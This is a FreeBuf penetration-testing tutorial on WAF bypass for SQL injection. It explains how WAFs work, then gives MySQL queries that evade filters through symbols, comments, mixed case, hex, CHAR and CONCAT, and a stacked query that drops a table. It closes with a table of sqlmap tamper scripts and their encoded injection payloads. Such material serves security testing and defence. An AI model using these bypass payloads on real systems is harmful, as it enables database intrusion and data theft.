freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

渗透测试 | SQL注入中的WAF绕过
2024-06-30 00:20:39

前言:

WAF(Web Application Firewall)即网络应用防火墙,是一种专门为了保护网络应用(如网站和web服务)而设计的防火墙。它的主要任务是过滤、监控和阻止恶意的网络流量和攻击尝试,从而保护web应用免受各种在线威胁,例如SQL注入、跨站脚本(XSS)攻击、文件包含攻击和其它形式的攻击。

WAF的工作原理:

  1. 流量监控与分析:WAF通过分析进出应用程序的HTTP流量来识别和阻止潜在的攻击。

  2. 规则集:WAF使用一组预定义的、可配置的规则来识别和阻止潜在的攻击。这些规则可以是基于模式匹配的规则,用于检测常见的攻击特征,如SQL注入的特定数据库函数或XSS攻击中的脚本标签。

  3. 黑名单与白名单:WAF可以设置黑名单来拒绝已知的攻击者或恶意IP地址,或者设置白名单来仅允许已知的安全流量。

  4. 行为分析:高级的WAF可能还包括对用户和应用程序行为的学习和分析,以更智能地识别异常行为,这有助于检测到以前未知的零日攻击。

WAF的部署方式:

  • 网络基础设施中的硬件或虚拟设备:部署在数据中心,直接在网络层面上提供保护。

  • 主机上的软件:直接在运行web应用的服务器上安装。

  • 云服务:作为服务提供,由第三方维护,易于扩展,通常以订阅模式提供。

WAF是网络安全策略中的重要组成部分,帮助组织在日益增长的网络威胁环境中保护其资产。


绕过

基本编码绕过

使用加号(+)替换空格尝试绕过基于空格的过滤规则。

SELECT+user+FROM mysql.user LIMIT 1;

image-20240629231249095

SELECT+user FROM mysql.user LIMIT 1;

image-20240629230447447

解释:

在MySQL中,+号被识别为算术运算符,用于加法操作。它并不用作连接符或空格替代符,因此在SQL查询中使用+号以期待它充当空格通常不是有效的做法。这也解释了为什么在某些情况下加号似乎被忽略,而在其他情况下则导致语法错误。

例如,当你尝试执行:

SELECT+user+FROM mysql.user LIMIT 1;

这里的SELECT+user可能由于解析器的某些灵活处理而被正确理解(即解析为SELECT user),尽管这并非标准SQL用法。然而,当+号被放置在FROM和其他部分之间时,它就显得格格不入,因为FROM后面通常需要跟表名,这里的+号打乱了这种结构,导致了解析失败。

标准的SQL语法不支持在关键字之间使用+号作为空格的替代。这种使用方式在不同的数据库系统和不同的解析器实现中可能会有不同的行为,而MySQL明确将其作为算术运算符处理。


使用 - 符号:

SELECT-user FROM mysql.user LIMIT 1;


image-20240629231703422

使用 @ 符号

SELECT@user FROM mysql.user LIMIT 1;

image-20240629231822109

使用 ! 符号

SELECT!user FROM mysql.user LIMIT 1;

image-20240629231907249

使用 ' 符号

SELECT'user'FROM mysql.user LIMIT 1;

image-20240629232023379

使用 " 符号

SELECT"user"FROM mysql.user LIMIT 1;

image-20240629232113041

使用 ~ 符号

SELECT~user FROM mysql.user LIMIT 1;

image-20240629232213200

使用 { 符号

SELECT '{' as bracket, user, '}' as bracket FROM mysql.user LIMIT 1;

image-20240629232448899

使用 -- 符号

SELECT user FROM mysql.user LIMIT 1 --;

image-20240629232718656

SELECT user FROM -- 注释掉部分语句导致错误
mysql.user LIMIT 1;

image-20240629232805945

使用 /* 符号

SELECT/**/user/**/FROM mysql.user LIMIT 1;


image-20240629232906457

使用SQL函数和转换

SELECT ASCII(SUBSTRING(user, 1, 1)) FROM mysql.user LIMIT 1;

这个命令通过获取user列的第一个字符的ASCII值,以不直接展示文本内容的形式返回数据。

image-20240629233323831

大小写混合

SeLeCt user fRoM mysql.user LiMiT 1;

改变SQL关键字的大小写,有些WAF可能只基于特定的大小写规则来检测。

image-20240629233354749

使用二进制和十六进制表示:

SELECT user FROM mysql.user WHERE user = 0x61646D696E LIMIT 1;

这里0x61646D696Eadmin的十六进制表示,可能绕过一些基于文本比对的WAF规则。

image-20240629233512413

使用字符串拼接

SELECT CONCAT('us','er') FROM mysql.user LIMIT 1;

使用CONCAT函数拼接字符串,避开直接的关键字使用。

image-20240629233544615


使用替代函数和命令

SELECT CHAR(117,115,101,114) FROM mysql.user LIMIT 1;

使用CHAR函数通过ASCII码来表示字符串,进一步尝试绕过基于文本匹配的规则。

image-20240629233635749

利用数据库特有功能

SELECT user FROM mysql.user WHERE user REGEXP '^z.*' LIMIT 1;

使用REGEXP正则表达式匹配功能来进行复杂的模式匹配。

image-20240629234124599

堆叠查询(如果支持)

SELECT user FROM mysql.user; DROP TABLE test_table;

这条命令尝试执行两个SQL语句,如果WAF没有正确配置,可能会执行第二个危险的命令。

image-20240629234843407

使用CASE语句

SELECT CASE WHEN (1=1) THEN user ELSE NULL END FROM mysql.user LIMIT 1;

通过CASE语句来动态决定输出,增加查询的复杂性,试图绕过简单的过滤规则。

image-20240629234937702

其他一些方法可以用于绕过Web应用防火墙(WAF),这些方法包括但不限于:

  1. HTTP请求欺骗

    • 修改HTTP请求的头部,如User-AgentReferer,或使用不寻常的HTTP方法(如PUTDELETE等)来尝试绕过对GETPOST的严格检查。

  2. 多字节字符编码

    • 利用WAF可能不正确处理字符编码的问题,使用多字节或双字节字符(如UTF-8)编码攻击向量,尤其是在WAF处理字符边界时可能出现的编码错误。

  3. 会话劫持

    • 利用会话劫持技术来绕过基于用户身份验证状态的安全检查。

  4. 内容类型混淆

    • 改变请求中的Content-Type头部信息,如将其从application/x-www-form-urlencoded更改为multipart/form-data或其他不常见类型,以尝试混淆WAF对请求体内容的解析。

  5. 路径遍历与文件包含

    • 通过修改文件路径来访问或执行服务器上未授权的文件,这些技术尝试利用WAF对路径解析和文件访问权限的处理不当。

  6. 逻辑漏洞利用

    • 利用应用本身的逻辑漏洞,这些漏洞可能不直接触发WAF的规则,例如通过特定的应用程序功能或API绕过安全检查。

  7. 加密和隧道技术

    • 使用SSL/TLS加密或其他隧道技术来隐藏恶意流量,尽管这需要在客户端和服务器之间有一定的协调。

尽管存在诸如参数污染、分段传输等多种技术可以尝试绕过Web应用防火墙(WAF),但在实际环境中,这些方法面对配置严密的WAF时往往难以奏效。这种情况突显了深入了解WAF的工作原理、不断更新攻击策略、以及定期进行渗透测试的重要性。在对抗高级WAF的过程中,寻找系统配置中的边缘情况或漏洞可能比直接尝试绕过WAF更为有效。此外,应认识到即便WAF是一个强大的防御工具,也不存在完全无懈可击的系统。通过细致分析和创新思维,我们能够更好地理解和评估潜在安全漏洞,从而确保系统的全面安全。这种方法不仅有助于强化现有安全措施,也为未来可能的安全挑战提供了准备。

道高一尺,魔高一丈

sqlmap绕过过滤的 tamper 脚本分类汇总

ALL:

支持的数据库脚本名称作用实现方式
ALLapostrophemask.py用utf8代替引号("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
ALLbase64encode.py用base64编码替换("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw=='
ALLmultiplespaces.py围绕SQL关键字添加多个空格('1 UNION SELECT foobar') '1 UNION SELECT foobar'
ALLspace2plus.py用+替换空格('SELECT id FROM users') 'SELECT+id+FROM+users'
ALLnonrecursivereplacement.py双重查询语句取代predefined SQL关键字('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--'
ALLspace2randomblank.py代替空格字符(“ ”)从一个随机的空白字符可选字符的有效集('SELECT id FROM users') 'SELECT%0Did%0DFROM%0Ausers'
ALLunionalltounion.py替换UNION ALL SELECT为UNION SELECT('-1 UNION ALL SELECT') '-1 UNION SELECT'
ALLsecuresphere.py追加特制的字符串('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

MSSQL:

支持的数据库脚本名称作用实现方式
MSSQLspace2hash.py绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)'1 AND 9227=9227' '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
MSSQLequaltolike.pylike 代替等号* Input: SELECT * FROM users WHERE id=1 * Output: SELECT * FROM users WHERE id LIKE 1
MSSQLspace2mssqlblank.py空格替换为其它空符号Input: SELECT id FROM users Output: SELECT%08id%02FROM%0Fusers
MSSQLspace2mssqlhash.py替换空格('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227'
MSSQLbetween.py用between替换大于号(>)('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
MSSQLpercentage.pyasp允许每个字符前面添加一个%号* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
MSSQLsp_password.py追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp_password'
MSSQLcharencode.pyurl编码* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%E

MySQL:

支持的数据库脚本名称作用实现方式
MySQLequaltolike.pylike 代替等号* Input: SELECT * FROM users WHERE id=1 * Output: SELECT * FROM users WHERE id LIKE 1
MySQLgreatest.py绕过过滤’>’ ,用GREATEST替换大于号。('1 AND A > B') '1 AND GREATEST(A,B+1)=A'
MySQLapostrophenullencode.py绕过过滤双引号,替换字符和双引号。tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
MySQLifnull2ifisnull.py绕过对 IFNULL 过滤。替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’('IFNULL(1, 2)') 'IF(ISNULL(1),2,1)'
MySQLspace2mssqlhash.py替换空格('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227'
MySQLmodsecurityversioned.py过滤空格,包含完整的查询版本注释('1 AND 2>1--') '1 /!30874AND 2>1/--'
MySQLspace2mysqlblank.py空格替换其它空白符号(mysql)Input: SELECT id FROM users Output: SELECT%0Bid%0BFROM%A0users
MySQLbetween.py用between替换大于号(>)('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
MySQLmodsecurityzeroversioned.py包含了完整的查询与零版本注释('1 AND 2>1--') '1 /!00000AND 2>1/--'
MySQLspace2mysqldash.py替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)('1 AND 9227=9227') '1--%0AAND--%0A9227=9227'
MySQLbluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like('SELECT id FROM users where id = 1') 'SELECT%09id FROM users where id LIKE 1'
MySQLpercentage.pyasp允许每个字符前面添加一个%号* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
MySQLcharencode.pyurl编码* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%E
MySQLrandomcase.py随机大小写* Input: INSERT * Output: InsERt
MySQLversionedkeywords.pyEncloses each non-function keyword with versioned MySQL comment* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# * Output: 1/!UNION!ALL!SELECT**!NULL/,/!NULL/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS**!CHAR/),CHAR(32)),CHAR(58,100,114,117,58))#
MySQLspace2comment.pyReplaces space character (‘ ‘) with comments ‘/**/’* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users
MySQLcharunicodeencode.py字符串 unicode 编码* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
MySQLversionedmorekeywords.py注释绕过* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# * Output: 1/!UNION!ALL!SELECT**!NULL/,/!NULL/,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFNULL/(CAST(/!CURRENT_USER/()/!AS**!CHAR/),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#
MySQLhalfversionedmorekeywords.py关键字前加注释* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa * Output: value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58)), NULL, NULL#/!0AND ‘QDWa’='QDWa
MySQLspace2morehash.py空格替换为 #号 以及更多随机字符串 换行符* Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Oracle:

支持的数据库脚本名称作用实现方式
Oraclegreatest.py绕过过滤’>’ ,用GREATEST替换大于号。('1 AND A > B') '1 AND GREATEST(A,B+1)=A'
Oracleapostrophenullencode.py绕过过滤双引号,替换字符和双引号。tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
Oraclebetween.py用between替换大于号(>)('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
Oraclecharencode.pyurl编码* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%E
Oraclerandomcase.py随机大小写* Input: INSERT * Output: InsERt
Oraclecharunicodeencode.py字符串 unicode 编码* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
Oraclespace2comment.pyReplaces space character (‘ ‘) with comments ‘/**/’* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users

PostgreSQL:

支持的数据库脚本名称作用实现方式
PostgreSQLgreatest.py绕过过滤’>’ ,用GREATEST替换大于号。('1 AND A > B') '1 AND GREATEST(A,B+1)=A'
PostgreSQLapostrophenullencode.py绕过过滤双引号,替换字符和双引号。tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
PostgreSQLbetween.py用between替换大于号(>)('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
PostgreSQLpercentage.pyasp允许每个字符前面添加一个%号* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
PostgreSQLcharencode.pyurl编码* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%E
PostgreSQLrandomcase.py随机大小写* Input: INSERT * Output: InsERt
PostgreSQLcharunicodeencode.py字符串 unicode 编码* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
PostgreSQLspace2comment.pyReplaces space character (‘ ‘) with comments ‘/**/’* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users

Microsoft Access:

支持的数据库脚本名称作用实现方式
Microsoft Accessappendnullbyte.py在有效负荷结束位置加载零字节字符编码('1 AND 1=1') '1 AND 1=1%00'

其他:

支持的数据库脚本名称作用实现方式
其他chardoubleencode.py双url编码(不处理以编码的)* Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
其他unmagicquotes.py宽字符绕过 GPC addslashes* Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20
其他randomcomments.py用/**/分割sql关键字‘INSERT’ becomes ‘IN//S//ERT’


总结

在当今网络安全的复杂环境中,Web应用防火墙(WAF)作为防御工具,提供了重要的第一道防线,旨在抵御各种在线威胁,如SQL注入和跨站脚本攻击。然而,攻击者也不断发展出新的技术来绕过这些防护,包括参数污染、分段传输、编码混淆等高级方法。

通过深入探讨WAF的工作原理和多种绕过技术,这篇文章不仅提供了技术层面的详细分析,还突显了对抗WAF的复杂性和挑战性。正如文中所述,面对配置良好的WAF,攻击者需依赖细致的分析和创造性的思维来识别潜在的安全漏洞。无懈可击的系统并不存在,然而,通过持续更新安全策略和进行渗透测试,能够有效地提升系统的安全性。

# 渗透测试 # web安全 # 系统安全 # 数据安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录